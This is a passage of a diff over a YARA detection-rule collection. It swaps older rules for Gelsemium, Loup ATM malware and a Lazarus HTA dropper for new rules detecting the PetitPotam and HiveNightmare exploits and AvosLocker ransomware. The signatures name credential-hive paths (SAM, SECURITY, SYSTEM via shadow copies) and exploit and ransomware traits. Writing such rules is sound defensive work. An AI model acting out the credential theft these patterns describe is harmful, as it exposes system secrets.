"https://twitter.com/DrunkBinary/status/1371423755608719360" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-15/APT28/APT_APT28_Zekapab_Mar_2021_1.yar#L1-L25" license_url = "N/A" - logic_hash = "06e7ee49092621c8469eeb1cd9e5cc1420a1879084e0d0a39181dc046bfa00cf" - score = 75 - quality = 75 + logic_hash = "dabaab47c193a05620d282a00b6b47f710cfa6b1efc699ea5d47267d10cfdcb6" + score = 60 + quality = 23 tags = "FILE" - hash1 = "1a9d78e5c255de239fb18b2cf47c4c2298f047073299c27fb54a0edf08a1d5a1" - hash1 = "51b9296ff1f562350cd63abd22c6032ef26d5ae6a3e2e5e0f851d8b1a5d0ee35" - tlp = "white" - adversary = "Gelsemium" + hash1 = "eae62bb4110bcd00e9d1bcaba9000defcda3d1ab832fa2634d928559d066cb15" strings: - $s1 = { 48 8b c4 55 41 56 41 57 48 8d a8 38 fa ff ff 48 81 ec b0 06 00 00 48 c7 85 a0 02 00 00 fe ff ff ff 48 89 58 08 48 89 70 10 48 89 78 18 4c 89 60 20 48 8b 05 68 bf 0b 00 48 33 c4 48 89 85 a0 05 00 00 45 33 e4 4c 89 65 08 4c 89 65 10 44 89 64 24 20 48 8d 54 24 20 48 8d 4d 08 e8 30 96 01 00 90 48 c7 85 f8 00 00 00 07 00 00 00 4c 89 a5 f0 00 00 00 66 44 89 a5 e0 00 00 00 45 8d 44 24 04 48 8d 15 79 d8 08 00 48 8d 8d e0 00 00 00 e8 dd b0 00 00 90 48 8d 8d e0 00 00 00 e8 50 30 ff ff 90 48 83 bd f8 00 00 00 08 72 0d 48 8b 8d e0 00 00 00 ff 15 b0 32 06 00 48 c7 85 b8 01 00 00 07 00 00 00 4c 89 a5 b0 01 00 00 66 44 89 a5 a0 01 00 00 41 b8 10 00 00 00 48 8d 15 61 d6 08 00 48 8d 8d a0 01 00 00 e8 85 b0 00 00 90 48 8d 95 a0 01 00 00 48 8d 8d 80 05 00 00 e8 41 96 01 00 90 48 83 bd b8 01 00 00 08 72 0d 48 8b 8d a0 01 00 00 ff 15 51 32 06 00 48 c7 85 68 04 00 00 07 00 00 00 4c 89 a5 60 04 00 00 66 44 89 a5 50 04 00 00 48 c7 85 78 01 00 00 07 00 00 00 4c 89 a5 70 01 00 00 66 44 89 a5 60 01 00 00 49 83 ce ff 4d 8b ce 45 33 c0 48 8d 95 80 05 00 00 48 8d 8d 60 01 00 00 e8 c8 ae 00 00 90 48 8d 95 60 01 00 00 48 8d 8d e0 01 00 00 e8 e4 5b ff ff 90 48 8d 8d 50 04 00 00 48 3b c8 74 15 4d 8b ce 45 33 c0 48 8b d0 48 8d 8d 50 04 00 00 e8 92 ae 00 00 48 8d 8d 50 04 00 00 e8 b6 11 ff ff 90 48 83 bd f8 01 00 00 08 72 0d 48 8b 8d e0 01 00 00 ff 15 a6 31 06 00 48 c7 85 f8 01 00 00 07 00 00 00 4c 89 a5 f0 01 00 00 66 44 89 a5 e0 01 00 00 48 83 bd 78 01 00 00 08 72 0d 48 8b 8d 60 01 00 00 ff 15 75 31 06 00 33 d2 48 8d 8d 50 04 00 00 e8 5f 2b 04 00 48 c7 85 58 01 00 00 07 00 00 00 4c 89 a5 50 01 00 00 66 44 89 a5 40 01 00 00 41 b8 0d 00 00 00 48 8d 15 b8 e2 08 00 48 8d 8d 40 01 00 00 e8 3c af 00 00 90 e8 96 2d ff ff 48 8d 48 30 48 8d 95 40 01 00 00 e8 b6 77 00 00 48 8b c8 e8 fe dc 02 00 48 8b c8 e8 16 d5 ff ff 90 48 83 bd 58 01 00 00 08 72 0d 48 8b 8d 40 01 00 00 ff 15 f6 30 06 00 48 c7 85 18 01 00 00 07 00 00 00 4c 89 a5 10 01 00 00 66 44 89 a5 00 01 00 00 41 b8 24 00 00 00 48 8d 15 d7 e3 08 00 48 8d 8d 00 01 00 00 e8 cb ae 00 00 90 48 8d 8d 00 01 00 00 e8 ce 6b 00 00 84 c0 0f 94 c3 48 83 bd 18 01 00 00 08 72 0d 48 8b 8d 00 01 00 00 ff 15 9a 30 06 00 84 db 0f 84 36 08 00 00 4c 89 a5 88 04 00 00 4c 89 a5 90 04 00 00 e8 f7 3b 01 00 48 89 85 88 04 00 00 48 c7 45 50 07 00 00 00 4c 89 65 48 66 44 89 65 38 41 b8 0b 00 00 00 48 8d 15 2a d6 08 00 48 8d 4d 38 e8 59 ae 00 00 90 e8 b3 2c ff ff 48 8d 48 30 48 8d 55 38 e8 96 75 00 00 48 c7 85 b0 04 00 00 07 00 00 00 4c 89 a5 a8 04 00 00 66 44 89 a5 98 04 00 00 4d 8b ce 45 33 c0 48 8b d0 48 8d 8d 98 04 00 00 e8 d7 ac 00 00 90 48 83 7d 50 08 72 0a 48 8b 4d 38 ff 15 fd 2f 06 00 48 c7 45 50 07 00 00 00 4c 89 65 48 66 44 89 65 38 4c 89 a5 b8 04 00 00 4c 89 a5 c0 04 00 00 4c 89 a5 c8 04 00 00 48 c7 45 00 07 00 00 00 4c 89 65 f8 66 44 89 65 e8 41 b8 01 00 00 00 48 8d 15 0d e3 08 00 48 8d 4d e8 e8 b8 ad 00 00 90 48 c7 45 c0 07 00 00 00 4c 89 65 b8 66 44 89 65 a8 41 b8 0d 00 00 00 48 8d 15 e9 e2 08 00 48 8d 4d a8 e8 90 ad 00 00 90 e8 ea 2b ff ff 48 8d 48 30 48 8d 55 a8 e8 cd 74 00 00 48 8b d0 4c 8d 45 e8 48 8d 8d b8 04 00 00 e8 1a 55 01 00 90 48 83 7d c0 08 72 0a 48 8b 4d a8 ff 15 50 2f 06 00 48 c7 45 c0 07 00 00 00 4c 89 65 b8 66 44 89 65 a8 48 83 7d 00 08 72 0a 48 8b 4d e8 ff 15 2e 2f 06 00 48 c7 45 00 07 00 00 00 4c 89 65 f8 66 44 89 65 e8 48 8d 85 98 04 00 00 48 89 85 c0 00 00 00 48 8d 85 88 04 00 00 48 89 85 c8 00 00 00 48 8b 9d b8 04 00 00 48 8b bd c0 04 00 00 48 3b df 0f 84 8b 02 00 00 66 90 4c 89 a5 48 05 00 00 4c 89 a5 50 05 00 00 48 c7 45 30 07 00 00 00 4c 89 65 28 66 44 89 65 18 4c 8d 85 50 04 00 00 48 83 bd 68 04 00 00 08 4c 0f 43 85 50 04 00 00 48 8d 95 50 04 00 00 48 0f 43 95 50 04 00 00 48 8b 85 60 04 00 00 4d 8d 04 40 48 8d 4d 18 e8 37 b4 01 00 90 48 8d 55 18 48 8d 8d 48 05 00 00 e8 36 9a 00 00 90 48 83 7d 30 } - $s2 = { 48 c7 85 b0 04 00 00 07 00 00 00 4c 89 a5 a8 04 00 00 66 44 89 a5 98 04 00 00 4c 8b 85 88 04 00 00 4d 8b c8 4d 8b 00 48 8d 95 28 02 00 00 48 8d 8d 88 04 00 00 e8 d1 fe 00 00 48 8b 8d 88 04 00 00 ff 15 5c 28 06 00 48 c7 45 e0 0f 00 00 00 4c 89 65 d8 c6 45 c8 00 41 b8 0e 00 00 00 48 8d 15 b7 db 08 00 48 8d 4d c8 e8 ee d0 00 00 90 48 8d 4d c8 e8 54 8c 01 00 48 8b d8 48 83 7d e0 10 72 0a 48 8b 4d c8 ff 15 18 28 06 00 48 c7 45 e0 0f 00 00 00 4c 89 65 d8 c6 45 c8 00 48 } - $s3 = { 48 8d 8d a8 02 00 00 e8 88 64 01 00 90 48 8b 08 48 89 4c 24 38 48 8b 48 08 48 89 4c 24 40 4c 89 20 4c 89 60 08 48 8d 54 24 38 48 8d 4c 24 48 e8 a0 8e 01 00 90 48 c7 45 a0 07 00 00 00 4c 89 65 98 66 44 89 65 88 41 b8 0b 00 00 00 48 8d 15 d9 d3 08 00 48 8d 4d 88 e8 a8 a5 00 00 90 48 8d 54 24 48 48 8d 4d 88 e8 d9 60 00 00 90 48 83 7d a0 08 72 0a 48 8b 4d 88 ff 15 7f 27 06 00 48 c7 45 a0 07 00 00 00 4c 89 65 98 66 44 89 65 88 48 8b 4c 24 48 48 85 c9 74 0b 48 8b 01 ba 01 00 00 00 ff 10 90 48 8b 4c 24 40 } - $s4 = { 48 83 7c 24 58 08 72 0b 48 8b 4c 24 40 ff 15 85 df 06 00 49 8b ce e8 05 dd ff ff e8 e0 db ff ff 48 8d 78 30 e8 27 fc ff ff 33 f6 84 c0 0f 85 ae 01 00 00 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 44 8d 46 07 48 8d 15 cf 84 09 00 48 8d 4c 24 20 e8 45 5d 01 00 90 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 44 8d 46 07 48 8d 15 a6 84 09 00 48 8d 4c 24 40 e8 1c 5d 01 00 90 48 8d 54 24 20 48 8b cf e8 5e 24 01 00 48 8b d8 48 8d 54 24 40 48 8d 4d 18 e8 4d 24 01 00 48 8b c8 48 8b d3 e8 72 c1 ff ff 85 c0 0f 9e c3 48 83 7c 24 58 08 72 0b 48 8b 4c 24 40 ff 15 d2 de 06 00 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 48 83 7c 24 38 08 72 0b 48 8b 4c 24 20 ff 15 ac de 06 00 84 db 0f 84 ed 00 00 00 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 41 b8 20 00 00 00 48 8d 15 ec 84 09 00 48 8d 4c 24 20 e8 82 5c 01 00 90 48 8d 05 3a aa 09 00 48 89 44 24 40 48 c7 44 24 60 07 00 00 00 48 89 74 24 58 66 89 74 24 48 49 83 c9 ff 45 33 c0 48 8d 54 24 20 48 8d 4c 24 48 e8 0c 5b 01 00 90 48 8d 05 e4 a8 09 00 48 89 45 80 48 8d 4d 88 ff 15 76 de 06 00 48 8d 05 ff e7 06 00 48 89 45 a0 48 89 75 a8 48 89 75 b0 48 89 75 b8 c7 45 c0 ff ff ff ff 48 8b 45 80 48 63 48 04 48 8d 05 71 9a 09 00 48 89 44 0d 80 48 8b 45 80 48 63 48 08 48 8d 05 bd ac 09 00 48 89 44 0d 80 48 8d 54 24 40 48 8d 4d 80 e8 a2 e0 02 00 48 8b d0 41 b8 01 00 00 00 48 8d 4d d0 e8 e0 05 00 00 48 8d 15 81 f8 0b 00 48 8d 4d d0 e8 a2 46 06 00 90 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 41 b8 0b 00 00 00 48 8d 15 67 83 09 00 48 8d 4c 24 20 e8 95 5b 01 00 90 48 8d 54 24 20 49 8b cd e8 d7 22 01 00 49 3b c4 74 13 49 83 c9 ff 45 33 c0 49 8b d4 48 8b c8 e8 30 5a 01 00 90 48 83 7c 24 38 08 72 0b 48 8b 4c 24 20 ff 15 54 dd 06 00 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 41 b8 07 00 00 00 48 8d 15 bc 82 09 00 48 8d 4c 24 20 e8 32 5b 01 00 90 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 41 b8 07 00 00 00 48 8d 15 91 82 09 00 48 8d 4c 24 40 e8 07 5b 01 00 90 48 8d 54 24 20 48 8d 4d 18 e8 48 22 01 00 48 8b d8 48 8d 54 24 40 48 8b cf e8 38 22 01 00 48 3b c3 74 13 49 83 c9 ff 45 33 c0 48 8b d3 48 8b c8 e8 91 59 01 00 90 48 83 7c 24 58 08 72 0b 48 8b 4c 24 40 ff 15 b5 dc 06 00 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 } + $s1 = { 68 74 74 70 3A 2F 2F } + $s2 = { 68 74 74 70 73 3A 2F 2F } + $s3 = { 32 44 34 46 37 30 36 35 36 45 32 30 37 30 37 32 36 46 36 33 36 35 37 33 37 33 32 44 } + $s4 = { 35 30 34 33 32 30 34 45 36 31 36 44 36 35 33 41 32 30 } + $s5 = { 34 42 34 32 37 32 36 34 32 30 34 43 36 31 36 45 36 37 33 41 32 30 } + $s6 = { 53 79 73 74 65 6d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4b 65 79 62 6f 61 72 64 20 4c 61 79 6f 75 74 73 5c 25 2e 38 78 } + $header1 = { 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 } + $header2 = { 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 25 73 } + $dbg1 = { 46 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 6e 00 6f 00 74 00 20 00 66 00 6f 00 75 00 6e 00 64 00 0d 00 4e 00 6f 00 74 00 20 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 65 00 64 } + $dbg2 = { 53 00 79 00 73 00 74 00 65 00 6d 00 20 00 45 00 72 00 72 00 6f 00 72 00 2e 00 20 00 20 00 43 00 6f 00 64 00 65 00 3a 00 20 00 25 00 64 00 2e 00 0d 00 0a 00 25 00 73 } + $dbg3 = { 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 25 00 73 00 2e 00 0a 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 65 00 64 00 2e } + $dbg4 = { 45 00 72 00 72 00 6f 00 72 00 20 00 72 00 65 00 61 00 64 00 69 00 6e 00 67 00 20 00 25 00 73 00 25 00 73 00 25 00 73 00 3a 00 20 00 25 00 73 } + $dbg5 = { 52 00 65 00 73 00 6f 00 6c 00 76 00 69 00 6e 00 67 00 20 00 68 00 6f 00 73 00 74 00 6e 00 61 00 6d 00 65 00 20 00 25 00 73 00 2e } + $dbg6 = { 53 00 6f 00 63 00 6b 00 65 00 74 00 20 00 45 00 72 00 72 00 6f 00 72 00 20 00 23 00 20 00 25 00 64 00 0d 00 0a 00 25 00 73 } condition: - uint16(0)==0x5a4d and filesize >300KB and 3 of ($s*) + uint16(0)==0x5a4d and filesize >100KB and 1 of ($header*) and 3 of ($s*) and 4 of ($dbg*) } -rule ARKBIRD_SOLG_APT_Gelsemium_Gelsenicine_June_2021_2 : FILE +rule ARKBIRD_SOLG_Exp_Petitpotam_July_2021_1 : FILE { meta: - description = "Detect Gelsenicine malware (Loader - Variant 2)" + description = "Detect PetitPotam exploit (local exploit version)" author = "Arkbird_SOLG" - id = "c6e28da2-622b-57ba-9381-9f8f6b8879bf" - date = "2021-06-12" - modified = "2021-06-14" - reference = "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-13/Gelsemium/APT_Gelsemium_Gelsenicine_June_2021_2.yara#L1-L19" + id = "dd23c77d-9929-5130-aad8-2bcc0a7dcbaa" + date = "2021-07-23" + modified = "2021-07-24" + reference = "https://github.com/topotam/PetitPotam" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20.21-07-23/PetitPotam/Exp_PetitPotam_July_2021_1.yara#L1-L24" license_url = "N/A" - logic_hash = "e1d6402c743af697c8d1b34087b6fe9db80237834d73967b0a0638023d4e4a40" + logic_hash = "a33a1dc2a3593063de2b65e01a770ff5c72ad360d88efdca588eacb8817fb91d" score = 75 - quality = 75 + quality = 69 tags = "FILE" - hash1 = "6eaeca0cf28e74de6cfd82d29a3c3cc30c2bc153ac811692cc41ee290d766474" - hash1 = "d986207bc108e55f4b110ae208656b415d2c5fcc8f99f98b4b3985e82b9d5e5b" - hash1 = "ec491de0e2247f64b753c4ef0c7227ea3548c2f222b547528dae0cf138eca53a" + hash1 = "10cbadc2c82178d3b7bdf96ab39b9e8580ee92c2038728b74d314e506c7a9144" tlp = "white" - adversary = "Gelsemium" + adversary = "-" strings: - $s1 = { 48 53 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 48 8b d9 c7 44 24 40 00 00 00 00 8b 05 [3] 00 a8 01 0f 85 96 00 00 00 83 c8 01 89 05 [3] 00 33 c0 88 44 24 40 4c 8d 44 24 40 48 8d 15 [3] 00 48 8d 0d [3] 00 ff 15 [2] 00 00 90 33 c0 88 44 24 48 4c 8d 44 24 48 48 8d 15 [3] 00 48 8d 0d [3] 00 ff 15 [2] 00 00 90 33 c0 88 44 24 40 4c 8d 44 24 40 48 8d 15 [3] 00 48 8d 0d [3] 00 ff 15 [2] 00 00 90 33 c0 88 44 24 48 4c 8d 44 24 48 48 8d 15 [3] 00 48 8d 0d [3] 00 ff 15 [2] 00 00 90 48 8d 0d [2] 00 00 e8 [2] 00 00 90 48 c7 43 08 00 00 00 00 48 c7 43 10 00 00 00 00 48 c7 43 18 00 00 00 00 4c 8d 0d [3] 00 4c 8d 05 [3] 00 33 d2 48 8b cb e8 86 f9 ff ff 48 8b c3 48 83 c4 30 } - $s2 = { 54 00 65 00 6d 00 70 00 2f 00 00 00 00 00 00 00 43 00 6f 00 6d 00 6d 00 6f 00 6e 00 41 00 70 00 70 00 44 00 61 00 74 00 61 00 2f 00 00 00 00 00 53 00 79 00 73 00 74 00 65 00 6d 00 2f 00 00 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 2f } - $s3 = { 48 8b ca e8 [3] 00 48 39 5e 08 75 05 48 8b c3 eb 08 48 8b 46 10 48 2b 46 08 3b c3 0f 4c c3 48 63 c8 e8 [3] 00 48 89 47 08 48 8b 56 10 48 8b 4e 08 4c 8b d8 eb 10 4c 3b db 74 05 8a 01 41 88 03 49 ff c3 48 ff c1 48 3b ca 75 eb 4c 89 5f 10 4c 89 5f 18 48 8b c7 48 83 c4 20 5f 5e } - $s4 = { 45 33 c9 45 33 c0 ba 80 00 00 00 48 8b ce e8 16 f2 ff ff 84 c0 74 71 48 8d 53 18 41 b8 20 00 00 00 48 8b ce e8 e4 f4 ff ff 84 c0 74 5b 48 8d 53 38 41 b8 20 00 00 00 48 8b ce e8 56 f9 ff ff 84 c0 74 45 48 8b 43 10 48 8b 0d [3] 00 48 3b c1 74 0d 48 8b d8 48 8b 00 48 3b c1 75 f5 eb 1b 48 8b 43 08 eb 07 48 8b d8 48 8b 40 08 48 3b 58 10 74 f3 48 39 43 10 48 0f } + $s1 = "\\pipe\\lsarpc" fullword wide + $s2 = { 5c 00 5c 00 25 00 73 00 5c 00 [4-12] 5c 00 [4-12] 00 2e 00 65 00 78 00 65 } + $s3 = { 5c 00 5c 00 25 00 73 00 00 00 00 00 6e 00 63 00 61 00 63 00 6e 00 5f 00 6e 00 70 } + $s4 = { 23 46 69 6c 65 20 45 72 72 6f 72 23 28 25 64 29 20 3a } + $s5 = { 43 6c 69 65 6e 74 20 68 6f 6f 6b 20 61 6c 6c 6f 63 61 74 69 6f 6e 20 66 61 69 6c 75 72 65 20 61 74 20 66 69 6c 65 20 25 68 73 20 6c 69 6e 65 20 25 64 } + $s6 = { 50 e8 06 95 ff ff 83 c4 10 c7 85 00 ff ff ff 00 00 00 00 8b 85 00 ff ff ff 50 8d 8d 0c ff ff ff 51 8d 55 dc 52 8b 45 f4 50 e8 4e 7a ff ff 83 c4 10 89 45 e8 83 7d } + $s7 = "Attack success!!!\n" fullword wide + $s8 = { 8b 43 0c 56 83 e8 24 8d 73 20 50 56 8d 45 b4 50 8d 45 e8 50 e8 02 02 00 00 68 b8 52 4f 00 8d 45 b4 50 68 bc 52 4f 00 8d 45 e8 50 8b 43 0c 68 c0 52 4f 00 ff 75 10 83 e8 24 68 cc 52 4f 00 50 68 00 53 4f 00 56 68 0c 53 4f 00 68 20 53 4f 00 68 78 53 4f 00 8d 85 c0 fe ff ff 68 f4 00 00 00 50 e8 4e 91 ff ff 83 c4 4c 8d 85 c0 fe ff ff 50 6a 04 } + $s9 = { 25 73 25 73 25 70 25 73 25 7a 64 25 73 25 64 25 73 25 73 25 73 25 73 25 73 } + $s10 = { 25 00 6c 00 73 00 28 00 25 00 64 00 29 00 20 00 3a 00 20 00 25 00 6c 00 73 } condition: - uint16(0)==0x5a4d and filesize >30KB and 3 of ($s*) + uint16(0)==0x5A4D and filesize >50KB and 7 of ($s*) } -import "pe" - -rule ARKBIRD_SOLG_Mal_ATM_Loup_Aug_2020_1 : FILE +rule ARKBIRD_SOLG_RAN_Avoslocker_July_2021_1 : FILE { meta: - description = "Detect ATM malware Loup by theirs strings." + description = "Detect AvosLocker ransomware" author = "Arkbird_SOLG" - id = "07c0fe02-a82a-58a7-8776-748a1c986f93" - date = "2020-08-17" - modified = "2020-08-18" - reference = "https://twitter.com/r3c0nst/status/1295275546780327936" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-17/Loup/Mal_ATM_Loup_Aug_2020_1.yar#L3-L34" + id = "3fbc707f-9802-54bc-933b-bc4c4953b1d0" + date = "2021-07-23" + modified = "2021-07-24" + reference = "https://blog.malwarebytes.com/threat-analysis/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20.21-07-23/AvosLocker/RAN_AvosLocker_July_2021_1.yara#L1-L23" license_url = "N/A" - logic_hash = "18e4d6af5d89746b42c87d7311e442f61deff3bfcbf57cc008d87290e91baafb" + logic_hash = "e2291f574b5ab68e901a76b6511e0ee4c1eee51d5e3eced62bf68ceedb061958" score = 75 - quality = 67 + quality = 75 tags = "FILE" - hash1 = "6c9e9f78963ab3e7acb43826906af22571250dc025f9e7116e0201b805dc1196" + hash1 = "43b7a60c0ef8b4af001f45a0c57410b7374b1d75a6811e0dfc86e4d60f503856" + hash2 = "fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f" + tlp = "white" + adversary = "-" strings: - $pdb1 = "C:\\Users\\muham\\source\\repos\\loup\\Debug\\loup.pdb" fullword ascii - $pdb2 = "PDBOpenValidate5" fullword ascii - $dbg1 = "Run-Time Check Failure #%d - %s" fullword ascii - $dbg2 = "Unknown Filename" fullword ascii - $dbg3 = "Unknown Module Name" fullword ascii - $info1 = "%s%s%p%s%zd%s%d%s%s%s%s%s" fullword ascii - $info2 = { 41 64 64 72 65 73 73 3a 20 30 78 } - $info3 = { 53 69 7a 65 3a } - $info4 = { 44 61 74 61 3a } - $s1 = "MSXFS.dll" fullword ascii - $s2 = "WFSExecute" fullword ascii - $s3 = "WfsVersion" fullword ascii - $s4 = "SvcVersion" fullword ascii - $s5 = "SpiVersion" fullword ascii - $s6 = "CurrencyDispenser1" fullword ascii - $s7 = "WFSUnlock" fullword ascii - $s8 = "WFSFreeResult" fullword ascii - $s9 = "WFSCleanUp" fullword ascii - $s10 = "WFSOpen" fullword ascii - $s11 = "WFSClose" fullword ascii - $s12 = "WFSStartUp" fullword ascii + $s1 = { 64 72 69 76 65 20 25 73 20 74 6f 6f 6b 20 25 66 20 73 65 63 6f 6e 64 73 0a 00 00 00 25 63 3a 00 64 72 69 76 65 3a 20 25 73 } + $s2 = { 63 6c 69 65 6e 74 5f 72 73 61 5f 70 72 69 76 3a 20 25 73 0a } + $s3 = { 2d 2d 2d 2d 2d 42 45 47 49 4e 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 2d 2d 2d 2d 2d 45 4e 44 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d } + $s4 = { ff 35 b8 2c 46 00 88 9d 7c ef ff ff e8 3c 56 02 00 50 8d 85 71 ef ff ff 50 e8 c5 9e ff ff 83 c4 0c 8d 85 94 ef ff ff 50 53 53 68 14 01 00 00 ff 35 b8 2c 46 00 ff b5 90 ef ff ff ff 15 00 a0 44 00 85 c0 0f 85 cd 00 00 00 8b 35 48 a0 44 00 8d 85 98 fe ff ff 53 68 ff 00 00 00 50 68 00 04 00 00 ff d6 50 53 68 00 10 00 00 ff 15 44 a0 44 00 b1 3e c7 85 70 ef ff ff 3e 7b 6c 6c c7 85 74 ef ff ff 71 6c 04 1e 8b c3 c7 85 78 ef ff ff 1b 4d 34 00 30 8c 05 71 ef ff ff 40 83 f8 0a 73 08 8a 8d 70 ef ff ff eb eb 8d 85 98 fe ff ff 88 9d 7b ef ff ff 50 8d 85 71 ef ff ff 50 e8 23 9e ff ff 0f 28 05 00 8b 45 00 59 0f 11 85 48 ef ff ff 59 0f 28 05 40 8b 45 00 8b cb 0f 11 85 58 ef ff ff 66 c7 } + $s5 = { 38 9d a0 fd ff ff 74 0c ff b5 94 fd ff ff e8 a6 ca ff ff 59 8d 85 ac fd ff ff 50 56 ff 15 48 a1 44 00 85 c0 0f 85 4d ff ff ff 8b 85 a4 fd ff ff 8b 8d 84 fd ff ff 8b 10 8b 40 04 2b c2 c1 f8 02 3b } + $s6 = { 4d 61 70 3a 20 25 73 0a 00 00 00 00 65 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6e 00 67 00 20 00 25 00 6c 00 73 00 20 00 66 00 61 00 69 00 6c 00 65 00 64 } + $s7 = { 44 6f 6e 65 21 21 0a 00 25 66 20 73 65 63 6f 6e 64 73 0a } + $s8 = { 56 68 01 00 00 08 6a 01 52 ff 15 14 a0 44 00 85 c0 0f 84 97 00 00 00 8d 45 f8 50 53 53 6a 06 53 ff 36 8b 1d 20 a0 44 00 ff d3 85 c0 74 73 ff 75 f8 e8 3b a7 01 00 a3 b8 2c 46 00 59 85 c0 } condition: - uint16(0)==0x5a4d and filesize <20KB and (pe.imphash()=="190fc01f66c40478aa91be89a98c57e9" and (1 of ($pdb*) and 2 of ($dbg*) and 2 of ($info*) and 9 of ($s*))) + uint16(0)==0x5A4D and filesize >50KB and 6 of ($s*) } -rule ARKBIRD_SOLG_APT_Lazarus_HTA_Apr_2021_1 : FILE +rule ARKBIRD_SOLG_Exp_CVE_2021_36934_July_2021_1 : FILE { meta: - description = "Detect HTA with the fake picture header as decoy used by Lazarus" + description = "Detect CVE_2021_36934 exploit (HiveNightmare)" author = "Arkbird_SOLG" - id = "1a57251e-f0fb-541c-bf8b-f1afecf7f1c7" - date = "2021-04-27" - modified = "2021-04-27" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-27/Lazarus/APT_Lazarus_HTA_Apr_2021_1.yara#L1-L21" + id = "3a0ed4f7-8a99-569f-a636-4cd64c2121bb" + date = "2021-07-23" + modified = "2021-07-23" + reference = "https://github.com/GossiTheDog/HiveNightmare" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20.21-07-23/HiveNightmare/Exp_CVE_2021_36934_July_2021_1.yara#L1-L23" license_url = "N/A" - logic_hash = "40c2e5b662d1999c3ae5be97604bb9ebc809a383d66331cb4b385666ce55be2a" + logic_hash = "2fd6cdf8a81f239473716d2c10a1754ebb2c60099eebd9d0cc1450ad3441075b" score = 75 - quality = 63 + quality = 48 tags = "FILE" - hash1 = "888cfc87b44024c48eed794cc9d6dea9f6ae0cc3468dee940495e839a12ee0db" + hash1 = "0009d4950559b508353b951a314c5ac0aaae8161751017d3d4681dc805374eaa" + hash2 = "7baab69f86b50199456c9208624dd16aeb0d18d8a6f2010ee6501a183476f12f" + hash3 = "9035f88894a937892c63ac9a3c6c16301c7ecea7c11cf31d0fd24c39f17c8c2f" tlp = "white" - adversary = "Lazarus" + adversary = "-" strings: - $s1 = { 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e } - $s2 = { 5b 27 4f 70 65 6e 54 65 78 74 46 69 6c 65 27 2c 27 43 72 65 61 74 65 54 65 78 74 46 69 6c 65 27 } - $s3 = { 5b 27 70 75 73 68 27 5d } - $s4 = { 28 27 4d 5a 27 29 2c 65 5b 27 43 6c 6f 73 65 27 5d 28 29 } - $s5 = { 5b 27 73 68 69 66 74 27 5d 28 29 } - $s6 = { 3b 76 61 72 20 64 61 74 61 3d 5b } - $s7 = { 62 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 27 53 63 72 69 70 74 69 6e 67 2e 46 69 6c 65 53 79 73 74 65 6d 4f 62 6a 65 63 74 27 29 } + $s1 = "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy" fullword wide + $s2 = "Windows\\System32\\config\\SECURITY" fullword wide + $s3 = "Windows\\System32\\config\\SYSTEM" fullword wide + $s4 = "Windows\\System32\\config\\SAM" fullword wide + $s5 = "SECURITY-" fullword wide + $s6 = { 43 6f 75 6c 64 20 6e 6f 74 20 6f 70 65 6e 20 53 45 43 55 52 49 54 59 20 3a } + $s7 = { 7a d1 3f 99 5c 2d 21 79 f2 21 3d 00 58 ac 30 7a b5 d1 3f 7e 84 ff 62 3e cf 3d 3d } condition: - ( uint16(0)==0x4d42 or uint16(0)==0xd8ff or uint32(0)==0x474e5089 or uint32(0)==0x38464947) and filesize >20KB and 5 of ($s*) + uint16(0)==0x5A4D and filesize >50KB and 5 of ($s*) } import "pe" @@ -194721,703 +196950,581 @@ rule ARKBIRD_SOLG_APT_MAL_NK_Rivts_Feb_2009_1 : FILE condition: uint16(0)==0x5a4d and filesize <100KB and 7 of them } -rule 